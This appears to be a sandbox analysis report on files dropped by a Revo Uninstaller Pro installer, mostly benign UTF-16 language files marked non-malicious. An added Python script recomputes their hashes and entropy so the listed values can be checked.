                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h. .....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .P.o.r.t.u.g.u...s./.P.o.r.t.u.g.u.e.s.e.....W.e.b.L.a.n.g.=.P.T.G.....T.r.a.n.s.l.a.t.o.r.=.L.u.i.s. .N.e.v.e.s. .(.l.u.i.s...a...n.e.v.e.s.@.s.a.p.o...p.t.). . .....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.r.....1.0.3. .=. .O.p.....e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .F.e.r.r.a.m.e.n.t.a.s.....1.0.6. .=. .M.o.d.o. .C.a...a.d.o.r. .....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. ...c.o.n.e.s.....1.0.9. .=. .D.e.t.a.l.h.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r. .....1.1.1. .=. .R.e.m.o.v.e.r. .e.n.t.r.a.d.a. .....1.1.2. .=. .A.c.t.u.a.l.i.z.a.r. .....1.1.3. .=. .T.e.m. .a. .c.e.r.t.e.z.a. .q.u.e. .d.e.s.e.j.a. .r.e.m.o.v.e.r. .a. .e.n.t.r.a.d.a. .s.e.l.e.c.c.i.o.n.a.d.a.?.....1.1.4. .=. .T.e.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (772), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):125262
                                                                                                                                                                          Entropy (8bit):3.4481536085983775
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:MOghAQX7wHPV3eonAqBL2h2OUFD5LVpi9:lghv5oK
                                                                                                                                                                          MD5:B5AA8BE80DAE51043BA6408D1D6B107E
                                                                                                                                                                          SHA1:6BE2B588839C87B3D8F25C3F5BEB7975AECB98E0
                                                                                                                                                                          SHA-256:E20F73F5E342B823B79F1C8C4D7EEF101A09127DB0700FCD79FDEF43F3CC25D7
                                                                                                                                                                          SHA-512:7CBFFEF592359D953A12788C558EF6AB31B468AA5ECC774FD3D22E3279C82DBAF16B1849F1B99A820F189FA36FFFA4564A2C3D7EC5042EB191FF390BB943828C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h. .....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.P.o.r.t.u.g.u...s. .(.P.o.r.t.u.g.a.l.).....W.e.b.L.a.n.g.=.P.T.G.S.T.D.....T.r.a.n.s.l.a.t.o.r.=.M.a.n.u.e.l.a. .S.i.l.v.a. .-. .L.u.i.s. .N.e.v.e.s. .(.l.u.i.s...a...n.e.v.e.s.@.s.a.p.o...p.t.). .-. .P.l.e.a.s.e. .d.o.n.'.t. .r.e.m.o.v.e. .t.h.e. .t.r.a.n.s.l.a.t.i.o.n. .w.i.t.h. .A.O. .1.9.9.0... .....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...0...5.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.r.....1.0.3. .=. .O.p.....e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .F.e.r.r.a.m.e.n.t.a.s.....1.0.6. .=. .M.o.d.o. .P.e.s.q.u.i.s.a. .....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. ...c.o.n.e.s.....1.0.9. .=. .D.e.t.a.l.h.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r. .....1.1.1. .=. .R.e.m.o.v.e.r. .E.n.t.r.a.d.a. .....1.1.2. .=. .A.t.u.a.l.i.z.a.r. .....1.1.3.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (724), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):131952
                                                                                                                                                                          Entropy (8bit):3.471989974502818
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:FrEbxaRaTtwkYAUc0tPNfKp+2MS1TXjUiU8v908:6bxaRaTqkVU3lNfKp+2MS1TXjUZWt
                                                                                                                                                                          MD5:BA3D16BF985F428DAB06AAA6CE7CE7B4
                                                                                                                                                                          SHA1:C8980ECE865ECD907A0FE43B8D2E898BE3276DFF
                                                                                                                                                                          SHA-256:F17E90AAC63F2E9630C81D73B9756A41B951874C44A483AA4E354D013E70D8B8
                                                                                                                                                                          SHA-512:0140E007F63F4BB84F6340C153E21138504292B1EA6EA7483747212CF4D437C5D449FE10989B4E341D9B3554B20BD780EBADC3D61C481FB25BB3F6653A1557CD
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h. .....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.P.o.r.t.u.g.u...s. ./. .P.o.r.t.u.g.u.e.s.e.(.B.r.a.s.i.l.).....W.e.b.L.a.n.g.=.P.T.-.B.R.....T.r.a.n.s.l.a.t.o.r.=.H...l.i.o. .d.e. .S.o.u.z.a. ./. .R.u.l.i.e.n. .O.l.d.a.n.i.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...0...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .E.x.i.b.i.r.....1.0.3. .=. .O.p.....e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .F.e.r.r.a.m.e.n.t.a.s.....1.0.6. .=. .M.o.d.o.\.n.C.a...a.d.o.r. .....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.c.o.n.e.s.....1.0.9. .=. .D.e.t.a.l.h.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r. .....1.1.1. .=. .R.e.m.o.v.e.r. .e.n.t.r.a.d.a. .....1.1.2. .=. .A.t.u.a.l.i.z.a.r. .....1.1.3. .=. .D.e.s.e.j.a. .r.e.m.o.v.e.r. .a. .e.n.t.r.a.d.a. .s.e.l.e.c.i.o.n.a.d.a.?.....1.1.4. .=. .D.e.s.e.j.a. .d.e.s.i.n.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (746), with CRLF, CR line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):138760
                                                                                                                                                                          Entropy (8bit):3.5938846070402
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:HN2MUMqfeZIyimlMWqCZLhewtbOIYe/1ifCWUINoE/hOsbg00p:t9UKXZ1eSjVA/U
                                                                                                                                                                          MD5:C76ADB4BB2BDB3722F0D0AA395F16262
                                                                                                                                                                          SHA1:B4594519DD221ECAEFC0D90909157F9C124811CE
                                                                                                                                                                          SHA-256:4635B47EFC36101D5AC7BBE3D529EF4850A2785CA59B8DD08541873D2579C083
                                                                                                                                                                          SHA-512:ABB1FCA558326124605D24B79670871B30E91977F1DA14DEC36AE61B5D3B53FB294ED80A3EF111B138B2970F9D3D22C7FAAB810A87613CD035614D4A05D69F33
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.R.o.m...n... ./. .R.o.m.a.n.i.a.n.....W.e.b.L.a.n.g.=.R.O.....T.r.a.n.s.l.a.t.o.r.=.A.l.e.x.a.n.d.r.u. .B.o.g.d.a.n. .M.u.n.t.e.a.n.u.,. .M.a.r.i.n.e.l. .C.i.p.u.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.d.e.r.e.....1.0.3. .=. .O.p...i.u.n.i.....1.0.4. .=. .D.e.z.i.n.s.t.a.l.a.t.o.r.....1.0.5. .=. .U.n.e.l.t.e.....1.0.6. .=. .V...n...t.o.r.....1.0.7. .=. .L.i.s.t.......1.0.8. .=. .I.c.o.a.n.e.....1.0.9. .=. .D.e.t.a.l.i.i.....1.1.0. .=. .D.e.z.i.n.s.t.a.l.e.a.z.......1.1.1. .=. ...n.l...t.u.r.......1.1.2. .=. ...m.p.r.o.s.p...t.e.a.z.......1.1.3. .=. .S.i.g.u.r. .v.r.e.i. .s... ...n.l...t.u.r.i. .i.n.t.r.a.r.e.a. .s.e.l.e.c.t.a.t...?.....1.1.4. .=. .S.i.g.u.r. .v.r.e.i. .s... .d.e.z.i.n.s.t.a.l.e.z.i. .p.r.o.g.r.a.m.u.
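Every dropped-file entry above reports the same fields: size, 8-bit entropy, MD5/SHA-1/SHA-256/SHA-512, a file-type hint and a byte preview. The UTF-16 language files all score an entropy of roughly 3.4 to 4.0 with "Encrypted:false", and the preview shows the tell-tale dot between every character (the 0x00 high byte of each UTF-16 code unit) and five dots at each CRLF. The script below recomputes those fields for a local copy of a file and diffs them against the reported values, so an analyst can confirm that a file found on a host is byte-for-byte the benign localisation resource the sandbox saw, or flag it if it is not. It is an added example, not Joe Sandbox's or Revo Uninstaller's code; the sample language file is constructed here to mimic the shape of the dropped files, and all function names are the editor's own.

```python
"""Recompute the dropped-file fields a sandbox report lists (size, 8-bit entropy,
MD5/SHA-1/SHA-256/SHA-512, file-type hint, preview) and diff them against the
reported values.  Added example, not Joe Sandbox code; the sample file is
constructed to resemble the Revo Uninstaller language files in the report."""
import hashlib
import math
from collections import Counter

# Constructed stand-in for a dropped language file: UTF-16 LE with BOM and CRLF,
# the same shape the report's "File Type" line describes.  Not the real file.
SAMPLE_TEXT = (
    "\ufeff;Language file of Revo Uninstaller Pro\r\n"
    ";This section must use English\r\n"
    "[Info]\r\n"
    "Language=Example/Example\r\n"
    "WebLang=EXA\r\n"
    "Codepage=UNICODE\r\n"
    "Version=5.3.4\r\n"
    "\r\n"
    "[Uninstaller Toolbar]\r\n"
    "102 = View\r\n"
    "103 = Options\r\n"
)
SAMPLE_BYTES = SAMPLE_TEXT.encode("utf-16-le")


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), as in the report's
    'Entropy (8bit)' field.  UTF-16 ASCII text scores ~3-4 because every other
    byte is 0x00; packed or encrypted data approaches 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def preview(data: bytes, limit: int = 64) -> str:
    """Render bytes the way the report's 'Preview' column does: printable ASCII
    as-is, every other byte (UTF-16 null bytes, the BOM, CR and LF) as '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:limit])


def file_type(data: bytes) -> str:
    """Coarse type hint for the two kinds of dropped file this report lists."""
    if data.startswith(b"\xff\xfe"):
        text = data[2:].decode("utf-16-le", errors="replace")
        eol = "CRLF" if "\r\n" in text else "LF"
        return f"UTF-16 LE text, {eol}"
    if data.startswith(b"MZ"):
        return "PE executable"
    return "data"


def describe(data: bytes) -> dict:
    """Compute the same fields the report lists for a dropped file."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        "file_type": file_type(data),
        "preview": preview(data),
    }


def verify(data: bytes, reported: dict, entropy_tolerance: float = 1e-6) -> list:
    """Return the names of reported fields that do not match a local copy of the
    file.  Hashes compare case-insensitively, entropy within a tolerance, and
    any other field by equality; an empty list means the copy matches."""
    actual = describe(data)
    mismatches = []
    for key, want in reported.items():
        have = actual.get(key)
        if key == "entropy":
            ok = abs(float(want) - have) <= entropy_tolerance
        elif key in ("md5", "sha1", "sha256", "sha512"):
            ok = str(want).upper() == have
        else:
            ok = want == have
        if not ok:
            mismatches.append(key)
    return mismatches


if __name__ == "__main__":
    for key, value in describe(SAMPLE_BYTES).items():
        print(f"{key}: {value}")
```

To use it against a real dropped file, read the file's bytes and pass a dict built from the report's lines (for example `{"size": 69202, "entropy": 3.580198978681514, "sha256": "0AF0D6E4..."}`) to `verify`; any name it returns is a field that disagrees with the sandbox's copy. Note that an entropy near 3.5 is the expected value for UTF-16 text, since half of every code unit is a null byte; it is not evidence of encryption or packing, which the report correctly reflects with "Encrypted:false".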
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (770), with CRLF line terminators
Category:dropped
Size (bytes):136156
Entropy (8bit):3.9772752876308854
Encrypted:false
SSDEEP:3072:Ugzuz4NjXBv1p4Yo2PklcxThfaZE2kYK1X5+P3b1rIdkXmU+g9X:Ug86XBv1p4Yo2PklcxThfaZE2DP3b1rX
MD5:A3F615CEE1B2AB1423853E0DCE67812C
SHA1:80EF64ABB8D7C8DBDEA00FD5552956F1750F3FF5
SHA-256:C4A2025D189CB616B4CFC45BAC348CF36D583964EA1936DF309C03CDA5C0104C
SHA-512:5D4C7AEA6E50B1DD4BE63357F04C3C1DA148BF6D5F8A55E797B405046EDBB8CF9858407F6A663F78A372992D6888A64ADB6AAE605C21C6B9ABF750CAAA18EDC9
Malicious:false
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (436), with CRLF line terminators
Category:dropped
Size (bytes):96936
Entropy (8bit):3.9548685823094414
Encrypted:false
SSDEEP:1536:Mlyvi0HQGqlUfM9T4xYIvZttVc1bVBuqqe25IHo06TVp0DK9k8hLoS60thmlLqtK:Mlyvi0HQGqlUfM54xYIvZttVc1bVBuqZ
MD5:8A38541BEFDD4A83B3413AF88AB27792
SHA1:977AE354F1D8529384C241B87232BAAD2A9217C5
SHA-256:D005F31F65527C1C409B1B43BA1BD0020310C1DDCAB58964BE5F763037F0314D
SHA-512:C1D954B632DF9DB0F7788E10074BF32DFC306B6D933EBE0A8F778FD831EBFB5DD4908B411430B911515E2AA676C8244E45B3BC4574793B62B193FDACDAECA080
Malicious:false
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (446), with CRLF line terminators
Category:dropped
Size (bytes):97878
Entropy (8bit):3.537880363749942
Encrypted:false
SSDEEP:768:woApxpwVcmmL4Htk5SWgduiI/Qyi+9QEo62eTLDme0HLZzzAiY+4mc0MzpUnjhq4:sxpcCSWV/Qa7vb0HFHlbRcVzqt6pTkd
MD5:6FF7FBB4F81CEF6CEE58E8A9A3973B23
SHA1:FDAA6816A3172EB4FB336B364B7DCDEC9F807412
SHA-256:E57B607071C548D701BDD2700D7D70B554FA27292CAE1043F622597235CBA1EF
SHA-512:FD623CA0205134A94C8D8A46722F6623802C55C69F22DD83F6C4DA32107337BEA20A5B4BE4307151327FF6D5AEFB0FDABB323D903B7789F42CD4907C6E49DDB3
Malicious:false
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:data
Category:dropped
Size (bytes):58204
Entropy (8bit):5.700930679207834
Encrypted:false
SSDEEP:768:lo5zGJ0/0BCAJQbmrd16Qo6DzKCvytFvNOv+0syWNgZC3L51N5K0gI9+O/nuGNLM:KzmlQodpo6ktF1++0DWNgW6fuHE8M7
MD5:6CB9F788594E515436E812AF86CE6971
SHA1:3E2EFCD077D3E91C1B22C511EBB8F9DC8087C3DF
SHA-256:C5AC1F6567EB3FDC2BB7809853F8F8D90D0DCEFCAC1E7EE881316AEFDE3D65EC
SHA-512:70FD68DFB13EB4EFCA05E9963D64E779EFF6CF4B3DCFD9AFA54E4374D91B2F82C6A3AF023F28A53057EE0C944FEE847896723E0EBCE4854308EA0159008913CA
Malicious:false
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (510), with CRLF line terminators
Category:dropped
Size (bytes):117334
Entropy (8bit):3.716232017222656
Encrypted:false
SSDEEP:3072:zoD4FEnB1D2yGMrJQK141CsyubT5GZGzC/v9OQ8+:zOV2LO
MD5:9E9BB9C33D54BE4D2A74E4540F99585D
SHA1:6F3733A4C377EBCDCC10E5811611AD26E6A8857F
SHA-256:830BBF9501D2BC51E52AC755FA26090298C5E6895BC9091AED97F506E0C9D4E8
SHA-512:75352F8809FD54C17026FE3220923398C18EE20B219F0C0E6970DA80F7483B63039FD4FF32632AD65C3B43B4EB3A345FF30AF59D9AA3AFB3AD97671B78DA0C4E
Malicious:false
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (679), with CRLF line terminators
Category:dropped
Size (bytes):133602
Entropy (8bit):3.516276711475207
Encrypted:false
SSDEEP:3072:Vk8NAAdeen1o1CGzbaTe2awmWp1FWgyLR8c3O:mW
MD5:C818A5793997CE34224359777E094BD5
SHA1:3A64A87007A2793FEDEE099B283A3F0383BF2F74
SHA-256:94123A86FA77F670133E4849FCFCD0564CBA01178075E778B67AB790C619E9AB
SHA-512:BD7D40ABCA01A1CB1397F7332F77FE52579AAB8ED33585C7E7787C9991C768E2BF062D3367A9A36B3A2B5404CC6E63085933241FDBC4676751435194427DCF9C
Malicious:false
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (619), with CRLF line terminators
Category:dropped
Size (bytes):135850
Entropy (8bit):3.4417582346095577
Encrypted:false
SSDEEP:768:lo6exv60KMuKMJ3XUvR7kcuKO+1vWbNPD5Etnx7qVwF/Z4DeTO9fMLp/GAwljIeK:axS0RuKMqR7kcuy1vWbUd/GV+Lbfn
MD5:AC710839BFC0EB302C8CB6A5194E1B6F
SHA1:7721A6CC3C22585ACF111F53C426FC0AF6602000
SHA-256:E88253ECC79EC3E528BD2ACCF23181830C06CA09F1912CAB6CE0E3C6A903AFBA
SHA-512:9E91C669A51F9EE1594F245774DD674FBE78CA8115F9EE8B07038C5D0DF505DBB016746332D25DA8943A026967ADEE0233448C352E89C58207BB959C9C9C0A2D
Malicious:false
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (767), with CRLF line terminators
Category:dropped
Size (bytes):128354
Entropy (8bit):3.480986127025453
Encrypted:false
SSDEEP:3072:7aptCikJrEmw4kK/D9YyhsiJNWFjNSj6VDJzwgCo:7aV
MD5:BCDE611DC4AAD7E214456CAFAB8FD146
SHA1:7E2865DDC57F0CC9EC4BC396808E79F90048D3C2
SHA-256:014A98FE1ED05D74C4BB37BC23295D318A827CA9ED140EB0D4824AB13B932327
SHA-512:EA2F7202A8F51E10E30F18465C5732E56AEEA81E3F90FBA53D865D8DB5D0551473A9A76E21A81931A506CACE484960A180A45E3197CDBAE59987F516E2B5EB81
Malicious:false
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (583), with CRLF line terminators
Category:dropped
Size (bytes):106396
Entropy (8bit):4.270018902460138
Encrypted:false
SSDEEP:1536:xR071uEADs98s2u4xu/7NoNQdyYEzFVI/2o9xrfln+R47G/LbWdE0wbmw1hCtumE:8398sgaUBFGP61wE
MD5:BA844724649201A288754E2F55838ED2
SHA1:F332C9A6022F567CF6A6F69200E1CD18FB125663
SHA-256:2D78A79A7EEE659D0BCB0F1DA0E4D9EE8209C6A6DA0A6965E93C409902495E4D
SHA-512:5917CEC00A8C81AE33AA6371E78422D95005D4796BB10E079F198E2F0B254272518A87D1C07E2DC7D4BF308F8D74C354176A6F03DC6CD4DC71D7B6F932267B24
Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .2.).2.D..."./.T.h.a.i.....W.e.b.L.a.n.g. .=. .T.H.A.I.....T.r.a.n.s.l.a.t.o.r. .=. .P.o.r.n.c.h.a.i. .P.e.t.t.h.a.v.e.e.p.o.r.n.d.e.j.....C.o.d.e.p.a.g.e. .=. .U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.4...4...2.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...9.....1.0.3. .=. ...1.'.@.%.7.-.......1.0.4. .=. .B...#.A...#.!...-.....2.#...4.....1.I.......1.0.5. .=. .@...#.7.H.-...!.7.-.....1.0.6. .=. .B.+.!.....1...@...-.#.L.....1.0.7. .=. .#.2."...2.#.....1.0.8. .=. .D.-...-.......1.0.9. .=. .#.2.".%.0.@.-.5.".......1.1.0. .=. ...-.....2.#...4.....1.I.......1.1.1. .=. .%...#.2."...2.#.....1.1.2. .=. .#.5.@...#.......1.1.3. .=. ...8...A...H.C...+.#.7.-.D.!.H.'.H.2...8.....I.-.....2.#.%...#.2."...2.#...5.H.@.%.7.-...?.....1.1.4. .=. ...8...A...H.C...+.#.7.-.D.!.H.'.H.2...I.-.....2.#...-.....2.#.
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (304), with CRLF line terminators
Category:dropped
Size (bytes):59906
Entropy (8bit):5.771309245234147
Encrypted:false
SSDEEP:1536:a1OmlKWIJw+wqYqn4wi7zv+vHj2gmoNus:o+wUY8W7zv+vHjlF
MD5:FEE3AE3394835522278A93B0BC0D90DE
SHA1:0E6E9CD7778E39B04CFC0360C8EEB3F96ADC7146
SHA-256:8EC726AE49EA372C038E275B034C0CD4DD71F12E4DDC426701A89F889F9AE804
SHA-512:F506246F3583B5D1E72F2FE5128D7CA17D8E2C5A75ABF522DCCA25622F84B672CE6C40EDFE945BDADF0C7B1B6C9BA1D9F8BB7985760E40AAB12BC23BC4BFAF3E
Malicious:false
Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .A~.-N.e ./. .T.r.a.d.i.t.i.o.n.a.l. .C.h.i.n.e.s.e.....W.e.b.L.a.n.g.=. .T.C.H.....T.r.a.n.s.l.a.t.o.r.=. .T.o.m.m.y. .C.h.e.n.,. .t.o.n.y.y.u.2.7.,. .K.e.v.i.n.Y.u.0.5.0.4.....C.o.d.e.p.a.g.e.=. .U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=. .5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ..j......1.0.3. .=. .x.......1.0.4. .=. ..yd..{.t.T....1.0.5. .=. .vQ.[.]wQ....1.0.6. .=. .us.N!j._....1.0.7. .=. ..n.U....1.0.8. .=. ..W:y....1.0.9. .=. .s.0}..e....1.1.0. .=. ..yd..[.....1.1.1. .=. ..yd....v....1.1.2. .=. ...ete.t....1.1.3. .=. ..`/f&T.x.....yd.x..S.v...v?.....1.1.4. .=. ..`/f&T.x.....yd..[.x..S.v.z._?.....1.1.5. .=. ...R.f.e....1.1.6. .=. ....f....1.1.7. .=. ..vMR.]wQ...f..........1.1.8. .=. ..}.z..........1.1.9. .=. ...e..........1.2.0. .=. ..`&N^..|q}.{.t.T!.....1.2.1. .=. ..`
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (656), with CRLF line terminators
Category:dropped
Size (bytes):129774
Entropy (8bit):3.6427799288392415
Encrypted:false
SSDEEP:3072:WZh0Mg04blwiRK6nWBgUwSnYE77SlqvRUy+2JykmAwT/WBGSBvO3PhC7CSfq3vb9:N+xDOMjRdno
MD5:150B402E0D5419C483B36AF4EC6D870C
SHA1:E1706E77AE988807AA60DE2BD028846B77543DB5
SHA-256:36C3A2CC9AAD2C03C81FB049765E5352A3BFE7CC65F462ECB4A24F9961A1CA3E
SHA-512:D4DF88863D41CE9A92725915BAAD6CD9B725F808CD00B300DFBA69A6A22A2C3984519AE9F05D376EF30053A8DD2D74A19567C295203E1F529D621C3702AF8BA9
Malicious:false
Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.T...r.k...e./.T.u.r.k.i.s.h.....W.e.b.L.a.n.g.=.T.R.....T.r.a.n.s.l.a.t.o.r.=.K.a.y.a. .Z.e.r.e.n. .t.r.a.n.s.l.a.t.o.r.@.z.e.r.o.n...n.e.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...0...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .G...r...n...m.....1.0.3. .=. .A.y.a.r.l.a.r.....1.0.4. .=. .K.a.l.d.1.r.1.c.1.....1.0.5. .=. .A.r.a...l.a.r.....1.0.6. .=. .A.v.c.1. .k.i.p.i.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .S.i.m.g.e.l.e.r.....1.0.9. .=. .A.y.r.1.n.t.1.l.a.r.....1.1.0. .=. .K.a.l.d.1.r.....1.1.1. .=. .K.a.y.1.d.1. .k.a.l.d.1.r.....1.1.2. .=. .Y.e.n.i.l.e.....1.1.3. .=. .S.e...i.l.m.i._. .k.a.y.d.1. .k.a.l.d.1.r.m.a.k. .i.s.t.e.d.i...i.n.i.z.e. .e.m.i.n. .m.i.s.i.n.i.z.?.....1.1.4. .=. .S.e...i.l.m.i._. .u.y.g.u.l.a.m.a.y.1. .k.a.l.d.1.r.m.a.k. .i.s.t.e.d.i...
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (641), with CRLF line terminators
Category:dropped
Size (bytes):131462
Entropy (8bit):4.006598591595778
Encrypted:false
SSDEEP:1536:bQUlrmrvEWUtL3EgNSp/7IAu821YhLxg2YS/:bQUlr0vG3TSp/7IAu82uhLd
MD5:2B18F02BB760F19F344D567B0C671EA8
SHA1:79BEC0F51098B51A90F63DA05CEBC8FBE560B556
SHA-256:71C9B4A2712ACD913EEE9FDF4178E344CD6AF79915CA01AC9FFBD6A797B096EA
SHA-512:55BEEDE938831AE93DBBE34C946AFE3C13EB0F670974DECA3275C2D431581C8D689703807E88CA28E483234CFD6C025B912EACCD8F645E3C9B409CC7CFA9950E
Malicious:false
Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .#.:.@.0.W.=.A.L.:.0./.U.k.r.a.i.n.i.a.n.....W.e.b.L.a.n.g.=.U.K.R.....T.r.a.n.s.l.a.t.o.r.=.A.l.e.x.e.y. .L.u.g.i.n. .-. .a.l.e.x.e.y.l.u.g.i.n.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (551), with CRLF line terminators
Category:dropped
Size (bytes):121866
Entropy (8bit):4.039495906761851
Encrypted:false
SSDEEP:768:lo4utFqYH2EX12i3SK0ZGjiuh1AjBVXstShQY6vbCXWpvXZnZtjAkussDj/5k0l1:Wii3SxojNuXs2KB82gEWNqu
